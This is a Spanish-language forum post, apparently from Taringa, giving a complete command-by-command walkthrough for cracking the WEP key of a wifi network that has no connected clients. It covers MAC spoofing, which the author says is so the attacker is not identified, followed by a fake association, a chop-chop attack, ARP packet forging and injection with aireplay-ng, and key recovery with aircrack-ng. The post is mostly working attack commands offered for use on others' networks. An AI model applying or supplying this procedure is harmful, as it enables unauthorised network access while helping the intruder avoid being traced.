Buenas Taringeros!!

Este manual está orientado ,sobretodo, para gente que quiera aprender a generar tráfico cuando no hay ningún cliente asociado al punto de acceso (o red wifi), (si no hay clientes no hay tráfico), y a hackearla, para sacar una clave WEP. Funciona

Recomiendo leer antes, los otros dos manuales:
* Wifiway 2.0.1 + USB Arrancable
* Instalación Wifiway 2.0.1 USB

Para empezar, es necessario que nuestra tarjeta de red Wireless, esté correctamente instalada y sus respectivos drivers. En este manual no enseñare a instalarlos ya que llevaria mucho tiempo y seria necessario otro manual (casi todas las tarjetas funcionan sin tener que instalar nada manualmente)
Vamos empezar!

Cambiamos la identidad
Es muy importante, que cuando realizamos este tipo de cosas no nos identifiquen. Así pues veamos como podemos cambiar nuestra "identidad" del portátil o pc.
Nota: Este manual va dirigido solamente a la gente que usa Wifiway 2.0.1 o una distribución GNU/Linux parecida.

Abrimos una terminal y buscamos las interfaces:
ifconfig
Comprovamos pues que tengamos la interface Wlan0
Para cambiar su identidad (MAC):
ifconfig wlan0 down
macchanger -m 00:01:02:03:04:05 wlan0
nota: puede ser cualquiera MAC yo le puesto esa.
ifconfig wlan0 up

Tarjeta a modo monitor

Con la misma terminal abierta, tecleamos:
airmon-ng start wlan0
(mode monitor enabled) mon0
Nos saldra que se habra activado mode monitor enabled y su interfaz mon0.

Airodump para detección de redes wifi
Ahora vamos a localizar las AP (routers o acces points)
Abrimos airodump-ng, desde Inicio/Wifiway/suite/airodump-ng y escogemos la interfaz mon0.

Vemos todos los wifis que hay a nuestro alrededor, apuntamos el canal que usa el wifi que queremos auditar así como el bssid y el ssid de dicha red wifi.

Ahora abrimos una consola (o terminal) y ponemos lo siguiente:
airodump-ng -c CANAL -b BSSID -w NOMBRE CAPTURA

Ejemplo:
airodump-ng -c 3 -b 00:02:CF:43:23 -w captura mon0

Dejamos este terminal abierto hasta el final, no lo cerréis.

Nos asociamos a la red wifi
Ahora procedemos a asociarnos al AP con la MAC falseada que hemos hecho antes.

aireplay-ng -1 10 -e SSID -a BSSID -h MAC QUE TENEMOS (FALSA)

Ejemplo:
aireplay-ng -1 10 -e WLAN_05 -a 00:02:CF:13:41 -h 00:01:02:03:04:05 mon0

Dejamos esta consola abierta, igual que la de airodump, NO LAS CERRÉIS!!!

Lanzamos el ataque chop chop
Como que para descifrar la contraseña de clave WEP, necesitamos que circule mucho tráfico,vamos a tener que generar nosotros mismos el tráfico. Para que aumente la #Data (trafico de paquetes) al máximo. Logicamente solo si vemos des de la ventana de airodump-ng que hicimos la Data sube lenta...

Abrimos la consola y ponemos:

aireplay-ng -4 -h MAC QUE TENEMOS (FALSA)

Nota: Nos pedirá que si queremos ese paquete WEP que ha cogido, debemos mirar que el BSSID que tiene es el mismo que el que hemos seleccionado nosotros, si lo es, ponemos y le damos a enter, entonces comenzará el proceso (tarda 1 minuto aproximadamente), cuando termine creará dos ficheros en root, uno con extensión .CAP y otro con extensión .XOR.

No cerréis la consola, porque si lo hacéis luego os tiraréis de los pelos…

Saber la IP de la red wifi
Ahora vamos a ver qué IP usa nuestra WIFI, si ya sabemos que es la de toda la vida (192.168.1.1) podemos saltarnos este paso.

tcpdump -s 0 -n -e -r ARCHIVO.CAP

Nota:Como el nombre del archivo .cap es tan largo, copiamos (de la consola anterior) y pegamos aquí. Pulsamos intro y os saldrán muchas cosas, aunque identificaréis fácilmente la IP de la red wifi.

Repito, casi siempre es 192.168.1.1 !!!

Fabricar paquete ARP para inyectarlo

Para aumentar la #Data, fabricaremos un paquete ARP con los datos del AP(router) y los nuestros para posteriormente inyectarlo con aireplay.

packetforge-ng -0 -a BSSID -h MAC QUE TENEMOS (FALSA) -k IP DEL AP -l IP DEL RANGO -y ARCHIVO.XOR (copiar y pegar del terminal abierto de antes) -w NOMBRE PAQUETE

Nota: La IP del rango, puede ser inventada siempre y cuando respete la MAC. Puede ser de la 192.168.1.2 a la 192.168.1.254
Nombre del paquete, puede ser cualquiera, como en el ejemplo.

Ejemplo:
packetforge-ng -0 -a 00:02:CF:13:15 -h 00:01:02:03:04:05 -k 192.168.1.1 -l 192.168.1.10 -y replay_etc.xor -w paquete

Inyección del paquete ARP fabricado
Procedemos a la inyección del paquete ARP fabricado anteriormente para conseguir IVs(#DATA):

aireplay-ng -2 -x 1024 -h MAC QUE TENEMOS (FALSA) -r ARCHIVO ARP FORJADO

Y le damos a enter, nos dirá que si queremos usarlo, ponemos y le damos a enter para confirmar.

Ejemplo:
aireplay-ng -2 -x 1024 -h 00:01:02:03:04:05 -r paquete mon0

Nota: Como veis donde pone 1024 es recomendable poner primero 600, eso es porque algunos AP no soportan tanto tráfico y se saturan, yo empezaría por 600 y luego subiendo de a más, hasta llegar a lo máximo (1024), en este caso, yo llegué a 1024 y no tuve ningún problema. Con 600 va de perlas también.

Esperar a que haya suficientes IVs(#Data)
Ahora esperamos hasta que los #data de la pantalla del airodump (la que NO hemos cerrado antes) suban hasta un número decente.

Como sube rápido y no nos cuesta nada esperar, yo lo dejaría hasta llegar al millón (para asegurarnos que la clave la podrá sacar aircrack).

Ejecutamos Aircrack-ng para conseguir la clave
Ahora ejecutamos aircrack para conseguir la clave, abrimos otra consola y ponemos:

aircrack-ng captura-01.cap

Nota: El archivo .cap es el que utilizamos en el paso "Airodump para detección de redes wifi"

Y listo, esperamos unos minutos y veremos nuestra recompensa "KEY FOUND"
Te la dejara con HEXADECIMAL(números) y ASCII(letras y números)

Si tenéis alguna duda no dudeis en preguntar.


Más adelante subo fotos...